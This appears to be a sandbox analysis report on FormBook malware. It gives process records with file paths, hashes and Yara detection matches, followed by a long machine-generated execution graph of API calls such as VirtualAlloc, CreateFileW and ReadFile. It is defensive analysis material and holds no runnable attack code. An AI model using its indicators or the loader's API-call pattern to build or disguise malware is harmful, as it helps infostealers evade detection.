                      Imagebase:0xda0000
                      File size:140'800 bytes
                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4651797494.0000000002EF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4651797494.0000000002EF0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:6
                      Start time:02:25:34
                      Start date:23/08/2024
                      Path:C:\Windows\SysWOW64\rasdial.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\SysWOW64\rasdial.exe"
                      Imagebase:0x9d0000
                      File size:19'456 bytes
                      MD5 hash:A280B0F42A83064C41CFFDC1CD35136E
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4642142846.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4642142846.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4651757327.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4651757327.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4651596001.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4651596001.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:false

                      General

                      Target ID:7
                      Start time:02:25:46
                      Start date:23/08/2024
                      Path:C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe"
                      Imagebase:0xda0000
                      File size:140'800 bytes
                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4654251110.00000000056E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4654251110.00000000056E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:9
                      Start time:02:25:59
                      Start date:23/08/2024
                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Imagebase:0x7ff728280000
                      File size:676'768 bytes
                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:3.2%
                        Dynamic/Decrypted Code Coverage:1.3%
                        Signature Coverage:5%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:55
                        execution_graph 94963 331033 94968 334c91 94963->94968 94967 331042 94976 33a961 94968->94976 94972 334d9c 94973 331038 94972->94973 94984 3351f7 22 API calls __fread_nolock 94972->94984 94975 3500a3 29 API calls __onexit 94973->94975 94975->94967 94985 34fe0b 94976->94985 94978 33a976 94995 34fddb 94978->94995 94980 334cff 94981 333af0 94980->94981 95020 333b1c 94981->95020 94984->94972 94987 34fddb 94985->94987 94988 34fdfa 94987->94988 94991 34fdfc 94987->94991 95005 35ea0c 94987->95005 95012 354ead 7 API calls 2 library calls 94987->95012 94988->94978 94990 35066d 95014 3532a4 RaiseException 94990->95014 94991->94990 95013 3532a4 RaiseException 94991->95013 94993 35068a 94993->94978 94997 34fde0 94995->94997 94996 35ea0c ___std_exception_copy 21 API calls 94996->94997 94997->94996 94998 34fdfa 94997->94998 95000 34fdfc 94997->95000 95017 354ead 7 API calls 2 library calls 94997->95017 94998->94980 95001 35066d 95000->95001 95018 3532a4 RaiseException 95000->95018 95019 3532a4 RaiseException 95001->95019 95003 35068a 95003->94980 95010 363820 _abort 95005->95010 95006 36385e 95016 35f2d9 20 API calls _abort 95006->95016 95008 363849 RtlAllocateHeap 95009 36385c 95008->95009 95008->95010 95009->94987 95010->95006 95010->95008 95015 354ead 7 API calls 2 library calls 95010->95015 95012->94987 95013->94990 95014->94993 95015->95010 95016->95009 95017->94997 95018->95001 95019->95003 95021 333b0f 95020->95021 95022 333b29 95020->95022 95021->94972 95022->95021 95023 333b30 RegOpenKeyExW 95022->95023 95023->95021 95024 333b4a RegQueryValueExW 95023->95024 95025 333b80 RegCloseKey 95024->95025 95026 333b6b 95024->95026 95025->95021 95026->95025 95027 33fe73 95034 34ceb1 95027->95034 95029 33fe89 95043 34cf92 95029->95043 95031 33feb3 95055 3a359c 82 API calls __wsopen_s 95031->95055 95033 384ab8 95035 34ced2 95034->95035 95036 34cebf 95034->95036 95038 34cf05 95035->95038 95039 34ced7 95035->95039 95056 33aceb 23 API calls ISource 95036->95056 95057 33aceb 23 API calls ISource 95038->95057 95040 34fddb 22 API calls 95039->95040 95042 34cec9 95040->95042 95042->95029 95058 336270 95043->95058 95045 34cfc9 95048 34cffa 95045->95048 95063 339cb3 95045->95063 95048->95031 95052 38d184 95054 38d188 95052->95054 95079 33aceb 23 API calls ISource 95052->95079 95054->95054 95055->95033 95056->95042 95057->95042 95059 34fe0b 22 API calls 95058->95059 95060 336295 95059->95060 95061 34fddb 22 API calls 95060->95061 95062 3362a3 95061->95062 95062->95045 95064 339cc2 _wcslen 95063->95064 95065 34fe0b 22 API calls 95064->95065 95066 339cea __fread_nolock 95065->95066 95067 34fddb 22 API calls 95066->95067 95068 339d00 95067->95068 95069 336350 95068->95069 95070 336362 95069->95070 95071 374a51 95069->95071 95080 336373 95070->95080 95090 334a88 22 API calls __fread_nolock 95071->95090 95074 33636e 95078 34d2f0 40 API calls 95074->95078 95075 374a5b 95076 374a67 95075->95076 95091 33a8c7 95075->95091 95078->95052 95079->95054 95081 3363b6 __fread_nolock 95080->95081 95082 336382 95080->95082 95081->95074 95082->95081 95083 374a82 95082->95083 95084 3363a9 95082->95084 95086 34fddb 22 API calls 95083->95086 95095 33a587 95084->95095 95087 374a91 95086->95087 95088 34fe0b 22 API calls 95087->95088 95089 374ac5 __fread_nolock 95088->95089 95090->95075 95092 33a8db 95091->95092 95094 33a8ea __fread_nolock 95091->95094 95093 34fe0b 22 API calls 95092->95093 95092->95094 95093->95094 95094->95076 95096 33a59d 95095->95096 95099 33a598 __fread_nolock 95095->95099 95097 37f80f 95096->95097 95098 34fe0b 22 API calls 95096->95098 95098->95099 95099->95081 95100 138295b 95103 13825d0 95100->95103 95102 13829a7 95116 1380000 95103->95116 95106 13826a0 CreateFileW 95107 138266f 95106->95107 95113 13826ad 95106->95113 95108 13826c9 VirtualAlloc 95107->95108 95107->95113 95114 13827d0 FindCloseChangeNotification 95107->95114 95115 13827e0 VirtualFree 95107->95115 95119 13834e0 GetPEB 95107->95119 95109 13826ea ReadFile 95108->95109 95108->95113 95110 1382708 VirtualAlloc 95109->95110 95109->95113 95110->95107 95110->95113 95111 13828ca 95111->95102 95112 13828bc VirtualFree 95112->95111 95113->95111 95113->95112 95114->95107 95115->95107 95121 1383480 GetPEB 95116->95121 95118 138068b 95118->95107 95120 138350a 95119->95120 95120->95106 95122 13834aa 95121->95122 95122->95118 95123 33df10 95126 33b710 95123->95126 95127 33b72b 95126->95127 95128 3800f8 95127->95128 95129 380146 95127->95129 95154 33b750 95127->95154 95132 380102 95128->95132 95135 38010f 95128->95135 95128->95154 95192 3b58a2 239 API calls 2 library calls 95129->95192 95190 3b5d33 239 API calls 95132->95190 95151 33ba20 95135->95151 95191 3b61d0 239 API calls 2 library calls 95135->95191 95139 3803d9 95139->95139 95142 380322 95195 3b5c0c 82 API calls 95142->95195 95146 33ba4e 95150 33bbe0 40 API calls 95150->95154 95151->95146 95196 3a359c 82 API calls __wsopen_s 95151->95196 95152 34d336 40 API calls 95152->95154 95154->95142 95154->95146 95154->95150 95154->95151 95154->95152 95155 33a8c7 22 API calls 95154->95155 95157 33ec40 95154->95157 95181 33a81b 41 API calls 95154->95181 95182 34d2f0 40 API calls 95154->95182 95183 34a01b 239 API calls 95154->95183 95184 350242 5 API calls __Init_thread_wait 95154->95184 95185 34edcd 22 API calls 95154->95185 95186 3500a3 29 API calls __onexit 95154->95186 95187 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95154->95187 95188 34ee53 82 API calls 95154->95188 95189 34e5ca 239 API calls 95154->95189 95193 33aceb 23 API calls ISource 95154->95193 95194 38f6bf 23 API calls 95154->95194 95155->95154 95163 33ec76 ISource 95157->95163 95158 34fddb 22 API calls 95158->95163 95159 350242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95159->95163 95160 384beb 95202 3a359c 82 API calls __wsopen_s 95160->95202 95161 33fef7 95168 33a8c7 22 API calls 95161->95168 95172 33ed9d ISource 95161->95172 95163->95158 95163->95159 95163->95160 95163->95161 95165 384600 95163->95165 95166 384b0b 95163->95166 95163->95172 95173 33a8c7 22 API calls 95163->95173 95174 33fbe3 95163->95174 95175 33a961 22 API calls 95163->95175 95176 3500a3 29 API calls pre_c_initialization 95163->95176 95179 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95163->95179 95180 33f3ae ISource 95163->95180 95197 3401e0 239 API calls 2 library calls 95163->95197 95198 3406a0 41 API calls ISource 95163->95198 95170 33a8c7 22 API calls 95165->95170 95165->95172 95200 3a359c 82 API calls __wsopen_s 95166->95200 95168->95172 95170->95172 95172->95154 95173->95163 95174->95172 95177 384bdc 95174->95177 95174->95180 95175->95163 95176->95163 95201 3a359c 82 API calls __wsopen_s 95177->95201 95179->95163 95180->95172 95199 3a359c 82 API calls __wsopen_s 95180->95199 95181->95154 95182->95154 95183->95154 95184->95154 95185->95154 95186->95154 95187->95154 95188->95154 95189->95154 95190->95135 95191->95151 95192->95154 95193->95154 95194->95154 95195->95151 95196->95139 95197->95163 95198->95163 95199->95172 95200->95172 95201->95160 95202->95172 95203 332e37 95204 33a961 22 API calls 95203->95204 95205 332e4d 95204->95205 95282 334ae3 95205->95282 95207 332e6b 95296 333a5a 95207->95296 95209 332e7f 95210 339cb3 22 API calls 95209->95210 95211 332e8c 95210->95211 95303 334ecb 95211->95303 95214 372cb0 95341 3a2cf9 95214->95341 95215 332ead 95219 33a8c7 22 API calls 95215->95219 95217 372cc3 95218 372ccf 95217->95218 95367 334f39 95217->95367 95223 334f39 68 API calls 95218->95223 95221 332ec3 95219->95221 95325 336f88 22 API calls 95221->95325 95225 372ce5 95223->95225 95224 332ecf 95226 339cb3 22 API calls 95224->95226 95373 333084 22 API calls 95225->95373 95227 332edc 95226->95227 95326 33a81b 41 API calls 95227->95326 95229 332eec 95232 339cb3 22 API calls 95229->95232 95231 372d02 95374 333084 22 API calls 95231->95374 95234 332f12 95232->95234 95327 33a81b 41 API calls 95234->95327 95235 372d1e 95237 333a5a 24 API calls 95235->95237 95238 372d44 95237->95238 95375 333084 22 API calls 95238->95375 95239 332f21 95242 33a961 22 API calls 95239->95242 95241 372d50 95243 33a8c7 22 API calls 95241->95243 95244 332f3f 95242->95244 95245 372d5e 95243->95245 95328 333084 22 API calls 95244->95328 95376 333084 22 API calls 95245->95376 95248 332f4b 95329 354a28 40 API calls 3 library calls 95248->95329 95250 372d6d 95254 33a8c7 22 API calls 95250->95254 95251 332f59 95251->95225 95252 332f63 95251->95252 95330 354a28 40 API calls 3 library calls 95252->95330 95256 372d83 95254->95256 95255 332f6e 95255->95231 95258 332f78 95255->95258 95377 333084 22 API calls 95256->95377 95331 354a28 40 API calls 3 library calls 95258->95331 95259 372d90 95261 332f83 95261->95235 95262 332f8d 95261->95262 95332 354a28 40 API calls 3 library calls 95262->95332 95264 332f98 95265 332fdc 95264->95265 95333 333084 22 API calls 95264->95333 95265->95250 95266 332fe8 95265->95266 95266->95259 95335 3363eb 22 API calls 95266->95335 95269 332fbf 95270 33a8c7 22 API calls 95269->95270 95272 332fcd 95270->95272 95271 332ff8 95336 336a50 22 API calls 95271->95336 95334 333084 22 API calls 95272->95334 95275 333006 95337 3370b0 23 API calls 95275->95337 95279 333021 95280 333065 95279->95280 95338 336f88 22 API calls 95279->95338 95339 3370b0 23 API calls 95279->95339 95340 333084 22 API calls 95279->95340 95283 334af0 __wsopen_s 95282->95283 95285 334b22 95283->95285 95381 336b57 95283->95381 95294 334b58 95285->95294 95378 334c6d 95285->95378 95287 339cb3 22 API calls 95289 334c52 95287->95289 95288 339cb3 22 API calls 95288->95294 95290 33515f 22 API calls 95289->95290 95292 334c5e 95290->95292 95292->95207 95293 334c29 95293->95287 95293->95292 95294->95288 95294->95293 95295 334c6d 22 API calls 95294->95295 95393 33515f 95294->95393 95295->95294 95410 371f50 95296->95410 95299 339cb3 22 API calls 95300 333a8d 95299->95300 95412 333aa2 95300->95412 95302 333a97 95302->95209 95432 334e90 LoadLibraryA 95303->95432 95308 334ef6 LoadLibraryExW 95440 334e59 LoadLibraryA 95308->95440 95309 373ccf 95311 334f39 68 API calls 95309->95311 95313 373cd6 95311->95313 95315 334e59 3 API calls 95313->95315 95317 373cde 95315->95317 95316 334f20 95316->95317 95318 334f2c 95316->95318 95462 3350f5 95317->95462 95320 334f39 68 API calls 95318->95320 95322 332ea5 95320->95322 95322->95214 95322->95215 95324 373d05 95325->95224 95326->95229 95327->95239 95328->95248 95329->95251 95330->95255 95331->95261 95332->95264 95333->95269 95334->95265 95335->95271 95336->95275 95337->95279 95338->95279 95339->95279 95340->95279 95342 3a2d15 95341->95342 95343 33511f 64 API calls 95342->95343 95344 3a2d29 95343->95344 95733 3a2e66 95344->95733 95347 3350f5 40 API calls 95348 3a2d56 95347->95348 95349 3350f5 40 API calls 95348->95349 95350 3a2d66 95349->95350 95351 3350f5 40 API calls 95350->95351 95352 3a2d81 95351->95352 95353 3350f5 40 API calls 95352->95353 95354 3a2d9c 95353->95354 95355 33511f 64 API calls 95354->95355 95356 3a2db3 95355->95356 95357 35ea0c ___std_exception_copy 21 API calls 95356->95357 95358 3a2dba 95357->95358 95359 35ea0c ___std_exception_copy 21 API calls 95358->95359 95360 3a2dc4 95359->95360 95361 3350f5 40 API calls 95360->95361 95362 3a2dd8 95361->95362 95363 3a28fe 27 API calls 95362->95363 95364 3a2dee 95363->95364 95365 3a2d3f 95364->95365 95739 3a22ce 95364->95739 95365->95217 95368 334f43 95367->95368 95369 334f4a 95367->95369 95370 35e678 67 API calls 95368->95370 95371 334f6a FreeLibrary 95369->95371 95372 334f59 95369->95372 95370->95369 95371->95372 95372->95218 95373->95231 95374->95235 95375->95241 95376->95250 95377->95259 95399 33aec9 95378->95399 95380 334c78 95380->95285 95382 374ba1 95381->95382 95384 336b67 _wcslen 95381->95384 95406 3393b2 95382->95406 95386 336ba2 95384->95386 95387 336b7d 95384->95387 95385 374baa 95385->95385 95388 34fddb 22 API calls 95386->95388 95405 336f34 22 API calls 95387->95405 95390 336bae 95388->95390 95392 34fe0b 22 API calls 95390->95392 95391 336b85 __fread_nolock 95391->95285 95392->95391 95394 33516e 95393->95394 95398 33518f __fread_nolock 95393->95398 95397 34fe0b 22 API calls 95394->95397 95395 34fddb 22 API calls 95396 3351a2 95395->95396 95396->95294 95397->95398 95398->95395 95400 33aed9 __fread_nolock 95399->95400 95401 33aedc 95399->95401 95400->95380 95402 34fddb 22 API calls 95401->95402 95403 33aee7 95402->95403 95404 34fe0b 22 API calls 95403->95404 95404->95400 95405->95391 95407 3393c0 95406->95407 95409 3393c9 __fread_nolock 95406->95409 95408 33aec9 22 API calls 95407->95408 95407->95409 95408->95409 95409->95385 95411 333a67 GetModuleFileNameW 95410->95411 95411->95299 95413 371f50 __wsopen_s 95412->95413 95414 333aaf GetFullPathNameW 95413->95414 95415 333ae9 95414->95415 95416 333ace 95414->95416 95426 33a6c3 95415->95426 95417 336b57 22 API calls 95416->95417 95419 333ada 95417->95419 95422 3337a0 95419->95422 95423 3337ae 95422->95423 95424 3393b2 22 API calls 95423->95424 95425 3337c2 95424->95425 95425->95302 95427 33a6dd 95426->95427 95431 33a6d0 95426->95431 95428 34fddb 22 API calls 95427->95428 95429 33a6e7 95428->95429 95430 34fe0b 22 API calls 95429->95430 95430->95431 95431->95419 95433 334ec6 95432->95433 95434 334ea8 GetProcAddress 95432->95434 95437 35e5eb 95433->95437 95435 334eb8 95434->95435 95435->95433 95436 334ebf FreeLibrary 95435->95436 95436->95433 95470 35e52a 95437->95470 95439 334eea 95439->95308 95439->95309 95441 334e6e GetProcAddress 95440->95441 95442 334e8d 95440->95442 95443 334e7e 95441->95443 95445 334f80 95442->95445 95443->95442 95444 334e86 FreeLibrary 95443->95444 95444->95442 95446 34fe0b 22 API calls 95445->95446 95447 334f95 95446->95447 95538 335722 95447->95538 95449 334fa1 __fread_nolock 95450 3350a5 95449->95450 95451 373d1d 95449->95451 95458 334fdc 95449->95458 95541 3342a2 CreateStreamOnHGlobal 95450->95541 95552 3a304d 74 API calls 95451->95552 95454 373d22 95456 33511f 64 API calls 95454->95456 95455 3350f5 40 API calls 95455->95458 95457 373d45 95456->95457 95459 3350f5 40 API calls 95457->95459 95458->95454 95458->95455 95461 33506e ISource 95458->95461 95547 33511f 95458->95547 95459->95461 95461->95316 95463 335107 95462->95463 95464 373d70 95462->95464 95574 35e8c4 95463->95574 95467 3a28fe 95716 3a274e 95467->95716 95469 3a2919 95469->95324 95472 35e536 ___DestructExceptionObject 95470->95472 95471 35e544 95495 35f2d9 20 API calls _abort 95471->95495 95472->95471 95474 35e574 95472->95474 95476 35e586 95474->95476 95477 35e579 95474->95477 95475 35e549 95496 3627ec 26 API calls _abort 95475->95496 95487 368061 95476->95487 95497 35f2d9 20 API calls _abort 95477->95497 95481 35e58f 95482 35e595 95481->95482 95483 35e5a2 95481->95483 95498 35f2d9 20 API calls _abort 95482->95498 95499 35e5d4 LeaveCriticalSection __fread_nolock 95483->95499 95485 35e554 __wsopen_s 95485->95439 95488 36806d ___DestructExceptionObject 95487->95488 95500 362f5e EnterCriticalSection 95488->95500 95490 36807b 95501 3680fb 95490->95501 95494 3680ac __wsopen_s 95494->95481 95495->95475 95496->95485 95497->95485 95498->95485 95499->95485 95500->95490 95507 36811e 95501->95507 95502 368177 95519 364c7d 95502->95519 95507->95502 95510 368088 95507->95510 95517 35918d EnterCriticalSection 95507->95517 95518 3591a1 LeaveCriticalSection 95507->95518 95508 368189 95508->95510 95532 363405 11 API calls 2 library calls 95508->95532 95514 3680b7 95510->95514 95511 3681a8 95533 35918d EnterCriticalSection 95511->95533 95537 362fa6 LeaveCriticalSection 95514->95537 95516 3680be 95516->95494 95517->95507 95518->95507 95524 364c8a _abort 95519->95524 95520 364cca 95535 35f2d9 20 API calls _abort 95520->95535 95521 364cb5 RtlAllocateHeap 95522 364cc8 95521->95522 95521->95524 95526 3629c8 95522->95526 95524->95520 95524->95521 95534 354ead 7 API calls 2 library calls 95524->95534 95527 3629d3 RtlFreeHeap 95526->95527 95531 3629fc __dosmaperr 95526->95531 95528 3629e8 95527->95528 95527->95531 95536 35f2d9 20 API calls _abort 95528->95536 95530 3629ee GetLastError 95530->95531 95531->95508 95532->95511 95533->95510 95534->95524 95535->95522 95536->95530 95537->95516 95539 34fddb 22 API calls 95538->95539 95540 335734 95539->95540 95540->95449 95542 3342bc FindResourceExW 95541->95542 95546 3342d9 95541->95546 95543 3735ba LoadResource 95542->95543 95542->95546 95544 3735cf SizeofResource 95543->95544 95543->95546 95545 3735e3 LockResource 95544->95545 95544->95546 95545->95546 95546->95458 95548 373d90 95547->95548 95549 33512e 95547->95549 95553 35ece3 95549->95553 95552->95454 95556 35eaaa 95553->95556 95555 33513c 95555->95458 95557 35eab6 ___DestructExceptionObject 95556->95557 95558 35eac2 95557->95558 95560 35eae8 95557->95560 95569 35f2d9 20 API calls _abort 95558->95569 95571 35918d EnterCriticalSection 95560->95571 95561 35eac7 95570 3627ec 26 API calls _abort 95561->95570 95564 35eaf4 95572 35ec0a 62 API calls 2 library calls 95564->95572 95566 35eb08 95573 35eb27 LeaveCriticalSection __fread_nolock 95566->95573 95568 35ead2 __wsopen_s 95568->95555 95569->95561 95570->95568 95571->95564 95572->95566 95573->95568 95577 35e8e1 95574->95577 95576 335118 95576->95467 95578 35e8ed ___DestructExceptionObject 95577->95578 95579 35e92d 95578->95579 95581 35e925 __wsopen_s 95578->95581 95585 35e900 ___scrt_fastfail 95578->95585 95590 35918d EnterCriticalSection 95579->95590 95581->95576 95582 35e937 95591 35e6f8 95582->95591 95604 35f2d9 20 API calls _abort 95585->95604 95586 35e91a 95605 3627ec 26 API calls _abort 95586->95605 95590->95582 95593 35e70a ___scrt_fastfail 95591->95593 95597 35e727 95591->95597 95592 35e717 95679 35f2d9 20 API calls _abort 95592->95679 95593->95592 95593->95597 95599 35e76a __fread_nolock 95593->95599 95595 35e71c 95680 3627ec 26 API calls _abort 95595->95680 95606 35e96c LeaveCriticalSection __fread_nolock 95597->95606 95598 35e886 ___scrt_fastfail 95682 35f2d9 20 API calls _abort 95598->95682 95599->95597 95599->95598 95607 35d955 95599->95607 95614 368d45 95599->95614 95681 35cf78 26 API calls 4 library calls 95599->95681 95604->95586 95605->95581 95606->95581 95608 35d976 95607->95608 95609 35d961 95607->95609 95608->95599 95683 35f2d9 20 API calls _abort 95609->95683 95611 35d966 95684 3627ec 26 API calls _abort 95611->95684 95613 35d971 95613->95599 95615 368d57 95614->95615 95616 368d6f 95614->95616 95694 35f2c6 20 API calls _abort 95615->95694 95618 3690d9 95616->95618 95623 368db4 95616->95623 95710 35f2c6 20 API calls _abort 95618->95710 95619 368d5c 95695 35f2d9 20 API calls _abort 95619->95695 95622 3690de 95711 35f2d9 20 API calls _abort 95622->95711 95625 368dbf 95623->95625 95626 368d64 95623->95626 95630 368def 95623->95630 95696 35f2c6 20 API calls _abort 95625->95696 95626->95599 95627 368dcc 95712 3627ec 26 API calls _abort 95627->95712 95629 368dc4 95697 35f2d9 20 API calls _abort 95629->95697 95633 368e08 95630->95633 95634 368e2e 95630->95634 95635 368e4a 95630->95635 95633->95634 95639 368e15 95633->95639 95698 35f2c6 20 API calls _abort 95634->95698 95701 363820 21 API calls 2 library calls 95635->95701 95638 368e33 95699 35f2d9 20 API calls _abort 95638->95699 95685 36f89b 95639->95685 95640 368e61 95643 3629c8 _free 20 API calls 95640->95643 95646 368e6a 95643->95646 95644 368fb3 95647 369029 95644->95647 95651 368fcc GetConsoleMode 95644->95651 95645 368e3a 95700 3627ec 26 API calls _abort 95645->95700 95649 3629c8 _free 20 API calls 95646->95649 95650 36902d ReadFile 95647->95650 95654 368e71 95649->95654 95655 369047 95650->95655 95656 3690a1 GetLastError 95650->95656 95651->95647 95653 368fdd 95651->95653 95652 368e45 __fread_nolock 95664 3629c8 _free 20 API calls 95652->95664 95653->95650 95657 368fe3 ReadConsoleW 95653->95657 95658 368e96 95654->95658 95659 368e7b 95654->95659 95655->95656 95662 36901e 95655->95662 95660 369005 95656->95660 95661 3690ae 95656->95661 95657->95662 95663 368fff GetLastError 95657->95663 95704 369424 28 API calls __wsopen_s 95658->95704 95702 35f2d9 20 API calls _abort 95659->95702 95660->95652 95705 35f2a3 20 API calls __dosmaperr 95660->95705 95708 35f2d9 20 API calls _abort 95661->95708 95662->95652 95672 369083 95662->95672 95673 36906c 95662->95673 95663->95660 95664->95626 95669 368e80 95703 35f2c6 20 API calls _abort 95669->95703 95670 3690b3 95709 35f2c6 20 API calls _abort 95670->95709 95672->95652 95676 36909a 95672->95676 95706 368a61 31 API calls 3 library calls 95673->95706 95707 3688a1 29 API calls __wsopen_s 95676->95707 95678 36909f 95678->95652 95679->95595 95680->95597 95681->95599 95682->95595 95683->95611 95684->95613 95686 36f8b5 95685->95686 95687 36f8a8 95685->95687 95690 36f8c1 95686->95690 95714 35f2d9 20 API calls _abort 95686->95714 95713 35f2d9 20 API calls _abort 95687->95713 95689 36f8ad 95689->95644 95690->95644 95692 36f8e2 95715 3627ec 26 API calls _abort 95692->95715 95694->95619 95695->95626 95696->95629 95697->95627 95698->95638 95699->95645 95700->95652 95701->95640 95702->95669 95703->95652 95704->95639 95705->95652 95706->95652 95707->95678 95708->95670 95709->95652 95710->95622 95711->95627 95712->95626 95713->95689 95714->95692 95715->95689 95719 35e4e8 95716->95719 95718 3a275d 95718->95469 95722 35e469 95719->95722 95721 35e505 95721->95718 95723 35e478 95722->95723 95725 35e48c 95722->95725 95730 35f2d9 20 API calls _abort 95723->95730 95729 35e488 __alldvrm 95725->95729 95732 36333f 11 API calls 2 library calls 95725->95732 95726 35e47d 95731 3627ec 26 API calls _abort 95726->95731 95729->95721 95730->95726 95731->95729 95732->95729 95738 3a2e7a 95733->95738 95734 3350f5 40 API calls 95734->95738 95735 3a2d3b 95735->95347 95735->95365 95736 3a28fe 27 API calls 95736->95738 95737 33511f 64 API calls 95737->95738 95738->95734 95738->95735 95738->95736 95738->95737 95740 3a22e7 95739->95740 95741 3a22d9 95739->95741 95743 3a232c 95740->95743 95744 35e5eb 29 API calls 95740->95744 95754 3a22f0 95740->95754 95742 35e5eb 29 API calls 95741->95742 95742->95740 95768 3a2557 95743->95768 95745 3a2311 95744->95745 95745->95743 95747 3a231a 95745->95747 95751 35e678 67 API calls 95747->95751 95747->95754 95748 3a2370 95749 3a2374 95748->95749 95750 3a2395 95748->95750 95753 3a2381 95749->95753 95756 35e678 67 API calls 95749->95756 95772 3a2171 95750->95772 95751->95754 95753->95754 95757 35e678 67 API calls 95753->95757 95754->95365 95755 3a239d 95758 3a23c3 95755->95758 95760 3a23a3 95755->95760 95756->95753 95757->95754 95779 3a23f3 95758->95779 95761 3a23b0 95760->95761 95762 35e678 67 API calls 95760->95762 95761->95754 95763 35e678 67 API calls 95761->95763 95762->95761 95763->95754 95764 3a23de 95764->95754 95767 35e678 67 API calls 95764->95767 95765 3a23ca 95765->95764 95787 35e678 95765->95787 95767->95754 95769 3a257c 95768->95769 95771 3a2565 __fread_nolock 95768->95771 95770 35e8c4 __fread_nolock 40 API calls 95769->95770 95770->95771 95771->95748 95773 35ea0c ___std_exception_copy 21 API calls 95772->95773 95774 3a217f 95773->95774 95775 35ea0c ___std_exception_copy 21 API calls 95774->95775 95776 3a2190 95775->95776 95777 35ea0c ___std_exception_copy 21 API calls 95776->95777 95778 3a219c 95777->95778 95778->95755 95786 3a2408 95779->95786 95780 3a24c0 95804 3a2724 95780->95804 95781 3a21cc 40 API calls 95781->95786 95783 3a24c7 95783->95765 95786->95780 95786->95781 95786->95783 95800 3a2606 95786->95800 95808 3a2269 40 API calls 95786->95808 95788 35e684 ___DestructExceptionObject 95787->95788 95789 35e695 95788->95789 95790 35e6aa 95788->95790 95882 35f2d9 20 API calls _abort 95789->95882 95799 35e6a5 __wsopen_s 95790->95799 95865 35918d EnterCriticalSection 95790->95865 95792 35e69a 95883 3627ec 26 API calls _abort 95792->95883 95795 35e6c6 95866 35e602 95795->95866 95797 35e6d1 95884 35e6ee LeaveCriticalSection __fread_nolock 95797->95884 95799->95764 95802 3a2617 95800->95802 95803 3a261d 95800->95803 95802->95803 95809 3a26d7 95802->95809 95803->95786 95805 3a2742 95804->95805 95806 3a2731 95804->95806 95805->95783 95807 35dbb3 65 API calls 95806->95807 95807->95805 95808->95786 95810 3a2714 95809->95810 95811 3a2703 95809->95811 95810->95802 95813 35dbb3 95811->95813 95814 35dbc1 95813->95814 95820 35dbdd 95813->95820 95815 35dbe3 95814->95815 95816 35dbcd 95814->95816 95814->95820 95822 35d9cc 95815->95822 95825 35f2d9 20 API calls _abort 95816->95825 95819 35dbd2 95826 3627ec 26 API calls _abort 95819->95826 95820->95810 95827 35d97b 95822->95827 95824 35d9f0 95824->95820 95825->95819 95826->95820 95828 35d987 ___DestructExceptionObject 95827->95828 95835 35918d EnterCriticalSection 95828->95835 95830 35d995 95836 35d9f4 95830->95836 95834 35d9b3 __wsopen_s 95834->95824 95835->95830 95844 3649a1 95836->95844 95842 35d9a2 95843 35d9c0 LeaveCriticalSection __fread_nolock 95842->95843 95843->95834 95845 35d955 __fread_nolock 26 API calls 95844->95845 95846 3649b0 95845->95846 95847 36f89b __fread_nolock 26 API calls 95846->95847 95848 3649b6 95847->95848 95849 363820 __fread_nolock 21 API calls 95848->95849 95852 35da09 95848->95852 95850 364a15 95849->95850 95851 3629c8 _free 20 API calls 95850->95851 95851->95852 95853 35da3a 95852->95853 95856 35da4c 95853->95856 95859 35da24 95853->95859 95854 35da5a 95855 35f2d9 __dosmaperr 20 API calls 95854->95855 95857 35da5f 95855->95857 95856->95854 95856->95859 